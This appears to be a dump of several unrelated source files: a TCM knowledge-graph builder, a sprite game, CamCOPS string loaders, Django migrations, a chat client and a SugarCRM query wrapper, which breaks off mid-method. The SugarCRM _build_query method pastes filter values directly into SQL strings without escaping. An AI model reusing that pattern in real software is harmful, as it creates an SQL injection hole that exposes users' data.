effect_keywords, effect_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/药材/功效关键词")
symptom_keywords, symptom_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/药材/病症_关键词")
pathogenisis_keywords, pathogenisis_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/病症/疾病原理性质关键词")
symptom_keyword_set = set(symptom_keyword_mappings)
# recipe -> effect: link each recipe keyword to every effect keyword
# mentioned in the recipe's 功用 (effect) field.
for i, entry in enumerate(common_chinese_drug_recipes):
    if "方剂名" not in entry:
        sys.stderr.write("The {:d}-th entry is without key \"方剂名\"!\n".format(i))
        sys.stderr.flush()
        continue
    if "功用" not in entry:
        sys.stderr.write("Entry {:} is without key \"功用\"!\n".format(entry["方剂名"]))
        sys.stderr.flush()
        continue
    #if entry["方剂名"] not in recipe_keyword_mappings:
        #sys.stderr.write("\"方剂名\" of entry {:} is not found in keyword file!\n".format(entry["方剂名"]))
        #sys.stderr.flush()
        #continue
    #recipe_id = recipe_keyword_mappings[entry["方剂名"]]
    # fuzzy match: any recipe keyword that appears as a substring of the name
    recipe_ids = (kw_id for kw_id, kws in recipe_keywords if any(kw in entry["方剂名"] for kw in kws))
    for recipe_id, effect_group in itertools.product(recipe_ids, effect_keywords):
        if any(kw in entry["功用"] for kw in effect_group[1]):
            graph.add((rdf_namespace.recipe[str(recipe_id)],
                       rdf_namespace.has_effect,
                       rdf_namespace.effect[str(effect_group[0])]))
# symptom -> effect: link symptoms to the effects named in their 对策
# (countermeasure) description.
for i, entry in enumerate(chinese_medicine_common_symptoms):
    if len(entry[0])==0:
        sys.stderr.write("The {:d}-th entry is without a legal key!\n".format(i))
        sys.stderr.flush()
        continue
    if "对策" not in entry[1]:
        sys.stderr.write("Entry {:} is without key \"对策\"!\n".format(entry[0]))
        sys.stderr.flush()
        continue
    std_keywords = set(entry[0])&symptom_keyword_set
    if len(std_keywords)>0:
        effect_group = (kw_id for kw_id, kws in effect_keywords if any(kw in entry[1]["对策"] for kw in kws))
        for spt, eft in itertools.product(std_keywords, effect_group):
            graph.add((rdf_namespace.symptom[str(symptom_keyword_mappings[spt])],
                       rdf_namespace.treatment_plan,
                       rdf_namespace.effect[str(eft)]))
# recipe -> symptom: three sources feed the same `major_in` relation --
# the common-recipe list (via 功用), the common-symptom list (via 给方),
# and the recipe encyclopaedia (via 适应症).
for i, entry in enumerate(common_chinese_drug_recipes):
    if "方剂名" not in entry:
        sys.stderr.write("The {:d}-th entry is without key \"方剂名\"!\n".format(i))
        sys.stderr.flush()
        continue
    if "功用" not in entry:
        sys.stderr.write("Entry {:} is without key \"功用\"!\n".format(entry["方剂名"]))
        sys.stderr.flush()
        continue
    #if entry["方剂名"] not in recipe_keyword_mappings:
        #sys.stderr.write("\"方剂名\" of entry {:} is not found in keyword file!\n".format(entry["方剂名"]))
        #sys.stderr.flush()
        #continue
    #recipe_id = recipe_keyword_mappings[entry["方剂名"]]
    recipe_ids = (kw_id for kw_id, kws in recipe_keywords if any(kw in entry["方剂名"] for kw in kws))
    for recipe_id, symptom_group in itertools.product(recipe_ids, symptom_keywords):
        if any(kw in entry["功用"] for kw in symptom_group[1]):
            graph.add((rdf_namespace.recipe[str(recipe_id)],
                       rdf_namespace.major_in,
                       rdf_namespace.symptom[str(symptom_group[0])]))
for i, entry in enumerate(chinese_medicine_common_symptoms):
    if len(entry[0])==0:
        sys.stderr.write("The {:d}-th entry is without a legal key!\n".format(i))
        sys.stderr.flush()
        continue
    if "给方" not in entry[1]:
        sys.stderr.write("Entry {:} is without key \"给方\"!\n".format(entry[0]))
        sys.stderr.flush()
        continue
    std_keywords = set(entry[0])&symptom_keyword_set
    if len(std_keywords)>0:
        # 给方 (prescription) is free text; parse it into a recipe list first
        recipe_plan = utils.format_recipe_from_str_to_list(entry[1]["给方"])
        recipe_plan = (recipe_keyword_mappings[r] for r in recipe_plan if r in recipe_keyword_mappings)
        for spt, rcp in itertools.product(std_keywords, recipe_plan):
            graph.add((rdf_namespace.recipe[str(rcp)],
                       rdf_namespace.major_in,
                       rdf_namespace.symptom[str(symptom_keyword_mappings[spt])]))
for i, entry in enumerate(chinese_drug_recipe_encyclopaedia):
    if "方剂名" not in entry:
        sys.stderr.write("The {:d}-th entry is without key \"方剂名\"!\n".format(i))
        sys.stderr.flush()
        continue
    if "适应症" not in entry:
        sys.stderr.write("Entry {:} is without key \"适应症\"!\n".format(entry["方剂名"]))
        sys.stderr.flush()
        continue
    #if entry["方剂名"] not in recipe_keyword_mappings:
        #sys.stderr.write("\"方剂名\" of entry {:} is not found in keyword file!\n".format(entry["方剂名"]))
        #sys.stderr.flush()
        #continue
    #recipe_id = recipe_keyword_mappings[entry["方剂名"]]
    recipe_ids = (kw_id for kw_id, kws in recipe_keywords if any(kw in entry["方剂名"] for kw in kws))
    for recipe_id, symptom_group in itertools.product(recipe_ids, symptom_keywords):
        if any(kw in entry["适应症"] for kw in symptom_group[1]):
            graph.add((rdf_namespace.recipe[str(recipe_id)],
                       rdf_namespace.major_in,
                       rdf_namespace.symptom[str(symptom_group[0])]))
# symptom -> pathogenesis: link symptoms to pathogenesis keywords via the
# 症候分类 (syndrome classification) field of the national standard.
for _, entry in prc_chinese_medicine_and_drug_trade_standard_chinese_medicine_symptom_diagnosis_standard_2016:
    if "症候分类" not in entry:
        sys.stderr.write("Entry {:} is without key \"症候分类\"!\n".format(entry["病症"]))
        sys.stderr.flush()
        continue
    std_symtom_keywords = (kw_id for kw_id, kws in symptom_keywords if any(kw in entry["病症"] for kw in kws))
    std_pathogenisis_keywords = (kw_id for kw_id, kws in pathogenisis_keywords if any(kw in entry["症候分类"] for kw in kws))
    for spt, phg in itertools.product(std_symtom_keywords, std_pathogenisis_keywords):
        graph.add((rdf_namespace.symptom[str(spt)],
                   rdf_namespace.originates_from,
                   rdf_namespace.pathogenisis[str(phg)]))
# symptom -> pathogenesis (second source): link via the 性质 (nature) field
# of the common-symptom database.
for i, entry in enumerate(chinese_medicine_common_symptoms):
    if len(entry[0])==0:
        sys.stderr.write("The {:d}-th entry is without a legal key!\n".format(i))
        sys.stderr.flush()
        continue
    if "性质" not in entry[1]:
        sys.stderr.write("Entry {:} is without key \"性质\"!\n".format(entry[0]))
        sys.stderr.flush()
        continue
    std_keywords = set(entry[0])&symptom_keyword_set
    if len(std_keywords)>0:
        pathogenisis_group = (kw_id for kw_id, kws in pathogenisis_keywords if any(kw in entry[1]["性质"] for kw in kws))
        for spt, phg in itertools.product(std_keywords, pathogenisis_group):
            graph.add((rdf_namespace.symptom[str(symptom_keyword_mappings[spt])],
                       rdf_namespace.originates_from,
                       # FIX: the object was rdf_namespace.effect[...], but phg
                       # is a pathogenesis keyword id; the parallel loop above
                       # uses rdf_namespace.pathogenisis for the same relation.
                       rdf_namespace.pathogenisis[str(phg)]))
# effect -> pathogenesis: an effect named in 对策 (countermeasure) applies to
# the pathogenesis named in 性质 (nature).
for i, entry in enumerate(chinese_medicine_common_symptoms):
    key = entry[0] if len(entry[0])>0 else i
    if "性质" not in entry[1]:
        sys.stderr.write("Entry {:} is without key \"性质\"!\n".format(key))
        sys.stderr.flush()
        continue
    if "对策" not in entry[1]:
        sys.stderr.write("Entry {:} is without key \"对策\"!\n".format(key))
        sys.stderr.flush()
        continue
    std_effect_keywords = (kw_id for kw_id, kws in effect_keywords if any(kw in entry[1]["对策"] for kw in kws))
    std_pathogenisis_keywords = (kw_id for kw_id, kws in pathogenisis_keywords if any(kw in entry[1]["性质"] for kw in kws))
    for eft, phg in itertools.product(std_effect_keywords, std_pathogenisis_keywords):
        # FIX: both namespaces were off by one kind (symptom[eft] and
        # effect[phg]); eft is an effect id and phg a pathogenesis id, per
        # the section comment and the generator definitions above.
        graph.add((rdf_namespace.effect[str(eft)],
                   rdf_namespace.applys_on,
                   rdf_namespace.pathogenisis[str(phg)]))
# Persist the assembled subgraph; XML (RDF/XML) output is the active choice.
#graph.serialize(destination="subgraph_wrt_recipe", format="nt")
graph.serialize(destination="subgraph_wrt_recipe", format="xml")
|
998,382 | 4894ce8e3b3639ec52de8939239fbd357565a8a9 | #slippery pizza
#sprites toch check
from livewires import games
import random
games.init(screen_width = 640, screen_height = 480, fps = 50)
class Pan(games.Sprite):
    """Mouse-controlled pan sprite; bumps any pizza it touches."""
    def update(self):
        """Track the mouse cursor each frame, then test for contact."""
        self.x, self.y = games.mouse.x, games.mouse.y
        self.check_collide()
    def check_collide(self):
        """Notify every sprite we currently overlap that it was hit."""
        for sprite in self.overlapping_sprites:
            sprite.handle_collide()
class Pizza(games.Sprite):
    """Pizza that teleports to a random on-screen spot when hit."""
    def handle_collide(self):
        """Jump to a uniformly random screen position."""
        self.x, self.y = (random.randrange(games.screen.width),
                          random.randrange(games.screen.height))
def main():
    """Set up background, pizza and pan sprites, then run the game loop."""
    wall_image = games.load_image("images/wall.jpg", transparent = False)
    games.screen.background = wall_image
    pizza_image = games.load_image("images/pizza.bmp")
    pizza_x = random.randrange(games.screen.width)
    pizza_y = random.randrange(games.screen.height)
    the_pizza = Pizza(image = pizza_image, x = pizza_x, y = pizza_y)
    games.screen.add(the_pizza)
    pan_image = games.load_image("images/pan.bmp")
    the_pan = Pan(image = pan_image,
                  x = games.mouse.x,
                  y = games.mouse.y)
    games.screen.add(the_pan)
    games.mouse.is_visible = False  # the pan sprite replaces the cursor
    games.screen.event_grab = True  # keep the mouse captured in the window
    games.screen.mainloop()
#Let's go!
# Guarded so importing this module (e.g. from tests) doesn't launch the game.
if __name__ == "__main__":
    main()
998,383 | 0a5d0ecd3bcfe04344cd60ffd2d903caedf3ba16 | #!/usr/bin/python2.7
# -*- encoding: utf8 -*-
"""
Copyright (C) 2012-2015 Rudolf Cardinal (rudolf@pobox.com).
Department of Psychiatry, University of Cambridge.
Funded by the Wellcome Trust.
This file is part of CamCOPS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import xml.etree.cElementTree as ElementTree
# ... cElementTree is a faster implementation
# ... http://docs.python.org/2/library/xml.etree.elementtree.html
# ... http://effbot.org/zone/celementtree.htm
import pythonlib.rnc_web as ws
from cc_logger import logger
import cc_pls
# =============================================================================
# Localization strings
# =============================================================================
def cache_strings():
    """
    Caches strings from the main XML string file.

    Idempotent: returns immediately once pls.stringDict is populated.
    Raises AssertionError if called before the WSGI entry point has set
    pls.CAMCOPS_STRINGS_FILE_ABSOLUTE.

    The string file looks like this:
        <?xml version="1.0" encoding="UTF-8"?>
        <resources>
            <string name="NAME">VALUE</string>
            <!-- ... -->
        </resources>
    """
    if cc_pls.pls.stringDict is not None:
        return
    if cc_pls.pls.CAMCOPS_STRINGS_FILE_ABSOLUTE is None:
        raise AssertionError(
            "pls.CAMCOPS_STRINGS_FILE_ABSOLUTE is None -- likely use of "
            "LSTRING/WSTRING in classmethod, before initialization via "
            "the WSGI application entry point")
    logger.debug("Loading XML file: " +
                 cc_pls.pls.CAMCOPS_STRINGS_FILE_ABSOLUTE)
    parser = ElementTree.XMLParser(encoding="UTF-8")
    tree = ElementTree.parse(cc_pls.pls.CAMCOPS_STRINGS_FILE_ABSOLUTE,
                             parser=parser)
    cc_pls.pls.stringDict = {}
    # find all children of the root with tag "string" and attribute "name"
    for e in tree.findall("./string[@name]"):
        cc_pls.pls.stringDict[e.attrib.get("name")] = e.text
def LSTRING(stringname): # equivalent of Titanium's L()
    """Looks up a string from the XML string file."""
    cache_strings()
    fallback = "XML_STRING_NOT_FOUND_" + stringname
    return cc_pls.pls.stringDict.get(stringname, fallback)
def WSTRING(stringname):
    """Returns a web-safe (HTML-escaped) version of a string from the XML string file."""
    return ws.webify(LSTRING(stringname))
def cache_extra_strings():
    """
    Caches strings from all the extra XML string files.

    Idempotent: returns immediately once pls.extraStringDicts is populated.
    Raises AssertionError if called before the WSGI entry point has set
    pls.EXTRA_STRING_FILES.

    The extra string files look like this:
        <?xml version="1.0" encoding="UTF-8"?>
        <resources>
            <task name="TASK_1">
                <string name="NAME_1">VALUE</string>
                <string name="NAME_2">VALUE WITH\nNEWLINE</string>
                <!-- ... -->
            </task>
            <!-- ... -->
        </resources>
    """
    if cc_pls.pls.extraStringDicts is not None:
        return
    if cc_pls.pls.EXTRA_STRING_FILES is None:
        raise AssertionError(
            "pls.EXTRA_STRING_FILES is None -- likely use of "
            "XSTRING/WXSTRING in classmethod, before initialization via "
            "the WSGI application entry point")
    cc_pls.pls.extraStringDicts = {}
    for filename in cc_pls.pls.EXTRA_STRING_FILES:
        logger.debug("Loading XML file: " + filename)
        parser = ElementTree.XMLParser(encoding="UTF-8")
        tree = ElementTree.parse(filename, parser=parser)
        root = tree.getroot()
        for taskroot in root.findall("./task[@name]"):
            taskname = taskroot.attrib.get("name")
            # setdefault replaces the manual "if not in: create" dance; later
            # files can still add to / override an existing task's strings.
            taskdict = cc_pls.pls.extraStringDicts.setdefault(taskname, {})
            for e in taskroot.findall("./string[@name]"):
                taskdict[e.attrib.get("name")] = e.text
def XSTRING(taskname, stringname, default=None):
    """Looks up a string from one of the optional extra XML string files."""
    cache_extra_strings()
    if default is None:
        default = "EXTRA_STRING_NOT_FOUND({}.{})".format(taskname, stringname)
    taskdict = cc_pls.pls.extraStringDicts.get(taskname)
    if taskdict is None:
        return default
    return taskdict.get(stringname, default)
def WXSTRING(taskname, stringname, default=None):
    """Returns a web-safe (HTML-escaped) version of an XSTRING (see above)."""
    return ws.webify(XSTRING(taskname, stringname, default))
def get_all_extra_strings():
    """Returns all extra strings, as a list of (task, name, value) tuples."""
    cache_extra_strings()
    return [(task, name, value)
            for task, subdict in cc_pls.pls.extraStringDicts.iteritems()
            for name, value in subdict.iteritems()]
def task_extrastrings_exist(taskname):
    """Has the server been supplied with extra strings for a specific task?"""
    cache_extra_strings()
    return taskname in cc_pls.pls.extraStringDicts
|
998,384 | 054ef5320dfce49eab918832b698a1b52347521f | from ex111.utilidadescev import moeda, dado
# Exercise demo: read a value from the user and print a summary with a
# 35% increase and an 80% decrease via the moeda helper module.
valor = float(input('Digite o valor: '))
moeda.resumo(valor,35,80)
998,385 | f6893871cf24d6211701eed9d5f274e29b7e0e8c | #####################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019.01 #
#####################################################
from .InferCifarResNet_width import InferWidthCifarResNet
from .InferImagenetResNet import InferImagenetResNet
from .InferCifarResNet_depth import InferDepthCifarResNet
from .InferCifarResNet import InferCifarResNet
from .InferMobileNetV2 import InferMobileNetV2
from .InferTinyCellNet import DynamicShapeTinyNet
|
998,386 | 6aa24979d922a13e71db107ee5cdc509c979c2ba | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-09-01 03:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the IDC (machine-room) model, backed by table t_idc."""

    dependencies = [
        ('assetsapp', '0005_software'),
    ]

    operations = [
        migrations.CreateModel(
            name='IDC',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=64, unique=True, verbose_name='机房名称')),
                ('memo', models.CharField(blank=True, max_length=128, null=True, verbose_name='备注')),
            ],
            options={
                'db_table': 't_idc',
                'verbose_name': '机房',
                'verbose_name_plural': '机房',
            },
        ),
    ]
|
998,387 | d2b0c69d67922f19cc2c4c5bb52dfb151c3d5045 | # Generated by Django 2.0 on 2020-04-06 17:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds the chat model: a message text plus an FK to its author (User)."""

    dependencies = [
        ('main_app', '0038_updates'),
    ]

    operations = [
        migrations.CreateModel(
            name='chat',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('message', models.CharField(max_length=200)),
                ('userid', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main_app.User')),
            ],
        ),
    ]
|
998,388 | 0497bd2b287ecb5754ce5465b20b49a3067e2ee3 | from FunctionBlock.CommPort import *
class BluetoothPort(CommPort):
    """CommPort specialisation addressed by a Bluetooth device address.

    open()/close() are currently no-ops; send/recv simply delegate to the
    CommPort base implementation.
    """
    def __init__(self, address):
        CommPort.__init__(self)
        self.address = address  # remote Bluetooth address (format not validated here)
    def open(self):
        """No-op: connection setup not implemented yet."""
        pass
    def close(self):
        """No-op: connection teardown not implemented yet."""
        pass
    def send_data(self, data):
        # FIX: parameter renamed from 'str', which shadowed the builtin.
        CommPort.send_data(self, data)
    def recv_data(self):
        return CommPort.recv_data(self)
998,389 | 3dcc4135157bbb3b4757003b007b321b659c0a9d | from TelaLogin import TelaLogin
# NOTE(review): naming a class "__init__" is highly unusual and confusing
# (it shadows the dunder-method convention); consider renaming to e.g. App,
# updating the instantiation below to match.
class __init__():
    def __init__(self):
        # the login window reference is discarded immediately; presumably
        # TelaLogin's constructor shows the window itself -- TODO confirm
        login = TelaLogin()
app = __init__()
|
998,390 | 047852d46560e16a9044d4d9dafb8f5e99421867 | import os
from .exceptions import ConfigException
def _get_env_variable(key: str) -> str:
    """Return the value of environment variable *key*; raise ConfigException if unset."""
    value = os.getenv(key)
    if value is not None:
        return value
    raise ConfigException()
HOST = _get_env_variable("HOST")
PORT = _get_env_variable("PORT")
KAFKA_BROKER_URL = _get_env_variable('KAFKA_BROKER_URL')
REAL_TRANSACTIONS_TOPIC = _get_env_variable('REAL_TRANSACTIONS_TOPIC')
FAKE_TRANSACTIONS_TOPIC = _get_env_variable('FAKE_TRANSACTIONS_TOPIC') |
998,391 | e670dce001514921d7d55842a500587b77c66d64 | #!/home/popego/envs/ALPHA-POPEGO/bin/python
# EASY-INSTALL-SCRIPT: 'igraph==0.4.5','igraph'
# setuptools-generated launcher: pin the igraph distribution and run its
# console script through pkg_resources.
__requires__ = 'igraph==0.4.5'
import pkg_resources
pkg_resources.run_script('igraph==0.4.5', 'igraph')
|
998,392 | a02ad9cfaad11ba86547f4c31ae95493d05be28f | #
# chat nickname --new
# chat nickname --list
# chat nickname --join
#
# announcement:
# needed so others know who should sign the participant list entries.
# anyone can cook up any roomID! and insert participant entries!
# key = "room"-ownerfinger-roomID
# value =
# closed participant list entry:
# key = "participant"-ownerfinger-roomID-participantfinger
# value = [ participantfinger ]
# closed message (one per recipient):
# key = "message"-roomid-fromfingerprint-tofingerprint-timestamp
# value =
#
import sys
import threading
import time
sys.path.append("../client")
import client
sys.path.append("../util")
import util
class Chat:
    """Two-party chat built on the key/value DB service.

    Messages are stored under "cmessage" records and new ones are polled
    once per second on a background thread while the foreground loop reads
    outgoing lines from stdin.
    """

    # nickname is my nickname for myself, e.g. "rtm".
    def __init__(self, nickname, othernickname):
        self.nickname = nickname
        self.other = othernickname

    # ask the DB service for new messages, once per second.
    def poller(self):
        c = client.Client(self.nickname)
        # ts1 tracks the newest message timestamp seen so far, so each
        # range() query only covers [ts1, now].
        ts1 = 0
        while True:
            ts2 = int(time.time())
            k1 = str(ts1)
            k2 = str(ts2)
            # XXX should do one range() per participant.
            rows = c.range("cmessage", frm=self.other, to=self.nickname, unique=[ k1, k2 ] )
            for row in rows:
                # row.value is [ timestamp, txt ]
                timestamp = int(row.value[0])
                txt = row.value[1]
                if timestamp > ts1:
                    ts1 = timestamp
                if row.nickname != c.nickname():
                    # only print messages that are not from us.
                    print("%s: %s" % (row.nickname, txt))
            time.sleep(1)

    # start a poller(), and read messages from the keyboard.
    def go(self):
        th = threading.Thread(target=lambda : self.poller())
        # Daemon thread: don't keep the process alive once stdin closes.
        th.daemon = True
        th.start()
        c = client.Client(self.nickname)
        while True:
            sys.stdout.write("%s-%s> " % (self.nickname, self.other))
            sys.stdout.flush()
            txt = sys.stdin.readline()
            if txt == '':
                # EOF on stdin ends the chat session.
                break
            # Strip the trailing newline from readline().
            txt = txt[0:-1]
            if len(txt) > 0:
                ts = str(int(time.time()))
                # XXX should somehow include chat instance ID,
                # XXX if more than one participant, once for each.
                c.put([ ts, txt ],
                      'cmessage',
                      to=self.other,
                      unique=ts)
if __name__ == '__main__':
    # CLI entry point. Usage: closedchat <mynickname> --new <othernickname>
    if len(sys.argv) == 4 and sys.argv[2] == "--new":
        mynickname = sys.argv[1]
        othernickname = sys.argv[3]
        ch = Chat(mynickname, othernickname)
        ch.go()
    else:
        sys.stderr.write("Usage: closedchat nickname --new othernickname\n")
        sys.exit(1)
|
998,393 | 20a4782641a9d96d1cfa5fe31f0d7b8c933c9909 | # Generated by Django 3.0.7 on 2020-07-04 05:38
from django.db import migrations, models
# Auto-generated Django migration: creates the ``kyc`` model holding a
# user's know-your-customer details (contact info, PAN and Aadhaar numbers
# plus their uploaded document scans).
class Migration(migrations.Migration):

    dependencies = [
        ('landing', '0002_dashboad_name'),
    ]

    operations = [
        migrations.CreateModel(
            name='kyc',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(blank=True, max_length=100)),
                ('email', models.CharField(blank=True, max_length=100)),
                ('phone', models.CharField(blank=True, max_length=10)),
                ('pan', models.CharField(blank=True, max_length=15)),
                ('pan_image', models.ImageField(blank=True, upload_to='images/')),
                ('adhaar', models.CharField(blank=True, max_length=100)),
                ('adhaar_image', models.ImageField(blank=True, upload_to='images/')),
            ],
        ),
    ]
|
998,394 | 4aca9796ee33c4bfed3d9856aabba7928b319501 | from django.conf.urls import patterns, include, url
from django.contrib import admin
# from django.conf import settings
# from django.conf.urls.static import static
# URL configuration for the clinic project.
# NOTE(review): ``patterns()`` and string view references were deprecated in
# Django 1.8 and removed in 1.10, so this urlconf only works on older
# Django versions -- confirm the project's Django pin before modernizing.
urlpatterns = patterns('',
    # Examples:
    url(r'^users/', include('patients.urls')),
    url(r'^articles/', include('articles.urls')),
    #url(r'^$', 'patients.views.home', name='home'),
    url(r'^$', 'clinic.views.home', name='home'),
    # url(r'^thank-you/$', 'patients.views.thankyou', name='thankyou'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^calendar/', include('calendars.urls')),
    # user auth urls
    url(r'^login/$', 'clinic.views.login'),
    url(r'^auth/$', 'clinic.views.auth_view'),
    url(r'^logout/$', 'clinic.views.logout'),
    url(r'^loggedin/$', 'clinic.views.loggedin'),
    url(r'^invalid/$', 'clinic.views.invalid_login'),
    url(r'^register/$', 'clinic.views.register_user'),
    url(r'^register_success/$', 'clinic.views.register_success'),
    url(r'^doctors/$', 'clinic.views.doctors_view')
)
|
998,395 | ba1b3cdc3488e2ddeb485ecfc4bc097f20c8c101 | from __future__ import unicode_literals
import copy
import logging
from six.moves import html_parser
HTMLP = html_parser.HTMLParser()
log = logging.getLogger(__name__)
class QueryList:
    """Query a SugarCRM module for specific entries.

    Behaves like a lazy Django-style queryset: ``filter``/``exclude``/
    ``order_by``/``only`` return new QueryList instances, and the API call
    is only issued when results are actually needed (len/iter/bool/
    indexing/``first``).
    """

    def __init__(self, entry, query='', order_by='', limit='', offset='', fields=None, links_to_names=None):
        """Constructor for QueryList.

        Keyword arguments:
        entry -- SugarEntry object to query
        query -- SQL query to be passed to the API
        order_by -- ORDER BY clause for the API
        limit, offset -- paging parameters passed to the API
        fields -- restrict returned fields to this list
        links_to_names -- related-link names to fetch alongside entries
        """
        self.model = entry
        self._query = query
        self._order_by = order_by
        # None means "not fetched yet"; a list once _fetch_all() ran.
        self._result_cache = None
        self.low_mark, self.high_mark = 0, None  # Used for offset/limit
        self._limit = limit
        self._offset = offset
        self._total = -1  # lazily filled by count()
        self._sent = 0
        self._fields = fields
        self._links_to_names = links_to_names

    def __deepcopy__(self, memo):
        """Deep-copy the queryset without populating its result cache."""
        # BUG FIX: the original called ``self.__class__()`` with no
        # arguments, which raises TypeError because __init__ requires the
        # ``entry`` parameter. Allocate without running __init__ instead;
        # every attribute is copied from __dict__ below anyway.
        obj = self.__class__.__new__(self.__class__)
        for k, v in self.__dict__.items():
            if k == '_result_cache':
                obj.__dict__[k] = None
            else:
                obj.__dict__[k] = copy.deepcopy(v, memo)
        return obj

    def __repr__(self):
        return '<%s %s>' % (self.__class__.__name__, self.model.module_name)

    def _fetch_all(self):
        """Run the query once and cache the returned entries."""
        if self._result_cache is None:
            result = self.model._search(self._query, self._order_by, self._offset, self._limit, self._fields,
                                        self._links_to_names)
            self._result_cache = result.get('entries', [])

    def __len__(self):
        if self._result_cache is None:
            self._fetch_all()
        return len(self._result_cache)

    def __iter__(self):
        self._fetch_all()
        return iter(self._result_cache)

    def __bool__(self):
        self._fetch_all()
        return bool(self._result_cache)

    def __getitem__(self, k):
        """Retrieve an item or slice from the set of results."""
        # NOTE(review): resetting limit/offset on every item access is
        # surprising but preserved from the original implementation.
        self.clear_limits()
        if not isinstance(k, (int, slice)):
            raise TypeError(
                'QuerySet indices must be integers or slices, not %s.'
                % type(k).__name__
            )
        assert ((not isinstance(k, slice) and (k >= 0)) or
                (isinstance(k, slice) and (k.start is None or k.start >= 0) and
                 (k.stop is None or k.stop >= 0))), \
            "Negative indexing is not supported."
        if self._result_cache is not None:
            return self._result_cache[k]
        if isinstance(k, slice):
            qs = self._chain()
            if k.start is not None:
                start = int(k.start)
            else:
                start = None
            if k.stop is not None:
                stop = int(k.stop)
            else:
                stop = None
            qs.set_limits(start, stop)
            qs._fetch_all()
            return qs._result_cache[::k.step] if k.step else qs._result_cache
        qs = self._chain()
        qs.set_limits(k, k + 1)
        qs._fetch_all()
        return qs._result_cache[0]

    def _chain(self, **kwargs):
        """
        Return a copy of the current QuerySet that's ready for another
        operation.
        """
        obj = self._clone()
        obj.__dict__.update(kwargs)
        return obj

    def _clone(self):
        """
        Return a copy of the current QuerySet. A lightweight alternative
        to deepcopy().
        """
        return QueryList(self.model,
                         query=self._query,
                         order_by=self._order_by,
                         limit=self._limit,
                         offset=self._offset,
                         fields=self._fields,
                         links_to_names=self._links_to_names)

    def set_limits(self, low=None, high=None):
        """
        Adjust the limits on the rows retrieved. Use low/high to set these,
        as it makes it more Pythonic to read and write. When the SQL query is
        created, convert them to the appropriate offset and limit values.

        Apply any limits passed in here to the existing constraints. Add low
        to the current low value and clamp both to any existing high value.
        """
        if high is not None:
            if self.high_mark is not None:
                self.high_mark = min(self.high_mark, self.low_mark + high)
            else:
                self.high_mark = self.low_mark + high
        if low is not None:
            if self.high_mark is not None:
                self.low_mark = min(self.high_mark, self.low_mark + low)
            else:
                self.low_mark = self.low_mark + low
        if self.low_mark == self.high_mark:
            # Empty window: clear limit/offset entirely.
            self.clear_limits()
        if self.low_mark != self.high_mark:
            self._limit, self._offset = self._get_limit_offset_params(self.low_mark, self.high_mark)

    def clear_limits(self):
        """Reset paging back to 'no limit, from the beginning'."""
        self._limit, self._offset = None, 0

    @staticmethod
    def _get_limit_offset_params(low_mark, high_mark):
        """Translate [low_mark, high_mark) into (limit, offset)."""
        offset = low_mark or 0
        if high_mark is not None:
            return (high_mark - offset), offset
        return None, offset

    def _build_query(self, **query):
        """Build the API query string from Django-style field lookups.

        Supported operator suffixes (after '__'): exact/eq, contains,
        startswith, in, gt, gte, lt, lte. Raises LookupError for others.
        """
        available_fields = list(self.model._available_fields.keys())
        q_str = ''
        for key, val in list(query.items()):
            # Get the field and the operator from the query
            key_field, key_sep, key_oper = key.partition('__')
            if key_field == 'pk' and 'id' not in query:
                key_field = 'id'
            if key_field in available_fields:
                if q_str != '':
                    q_str += ' AND '
                # Custom fields (suffix '_c') live in the '<table>_cstm' table.
                if_cstm = ''
                if key_field.endswith('_c'):
                    if_cstm = '_cstm'
                field = self.model._table + if_cstm + '.' + key_field
                if key_oper in ('exact', 'eq') or (not key_oper and not key_sep):
                    q_str += '%s = "%s"' % (field, val)
                elif key_oper == 'contains':
                    q_str += '%s LIKE "%%%s%%"' % (field, val)
                elif key_oper == 'startswith':
                    q_str += '%s LIKE "%s%%"' % (field, val)
                elif key_oper == 'in':
                    q_str += '%s IN (' % field
                    for elem in val:
                        q_str += "'%s'," % elem
                    q_str = q_str.rstrip(',')
                    q_str += ')'
                elif key_oper == 'gt':
                    q_str += '%s > "%s"' % (field, val)
                elif key_oper == 'gte':
                    q_str += '%s >= "%s"' % (field, val)
                elif key_oper == 'lt':
                    q_str += '%s < "%s"' % (field, val)
                elif key_oper == 'lte':
                    q_str += '%s <= "%s"' % (field, val)
                else:
                    raise LookupError('Unsupported operator')
        return q_str

    def get(self, **query):
        """Return the single entry matching *query*.

        Raises the model's DoesNotExist / MultipleObjectsReturned when the
        match count is not exactly one.
        """
        qs = self.filter(**query)
        num = len(qs)
        if num == 1:
            return qs.first()
        if not num:
            raise self.model.DoesNotExist(
                "%s matching query does not exist." %
                self.model.module_name
            )
        raise self.model.MultipleObjectsReturned(
            'get() returned more than one %s -- it returned %s!' % (
                self.model.module_name,
                num,
            )
        )

    def filter(self, **query):
        """Filter this QueryList, returning a new QueryList.

        Keyword arguments:
        query -- kwargs dictionary where the filters are specified:
            The keys should be some of the entry's field names, suffixed by
            '__' and one of the following operators: 'exact', 'contains', 'in',
            'gt', 'gte', 'lt' or 'lte'. When the operator is 'in', the
            corresponding value MUST be a list.
        """
        if self._query != '':
            query = '(%s) AND (%s)' % (self._query, self._build_query(**query))
        else:
            query = self._build_query(**query)
        return QueryList(self.model,
                         query,
                         order_by=self._order_by,
                         limit=self._limit,
                         offset=self._offset,
                         fields=self._fields,
                         links_to_names=self._links_to_names)

    def all(self):
        """Return a fresh (uncached) copy of this QueryList."""
        return QueryList(self.model,
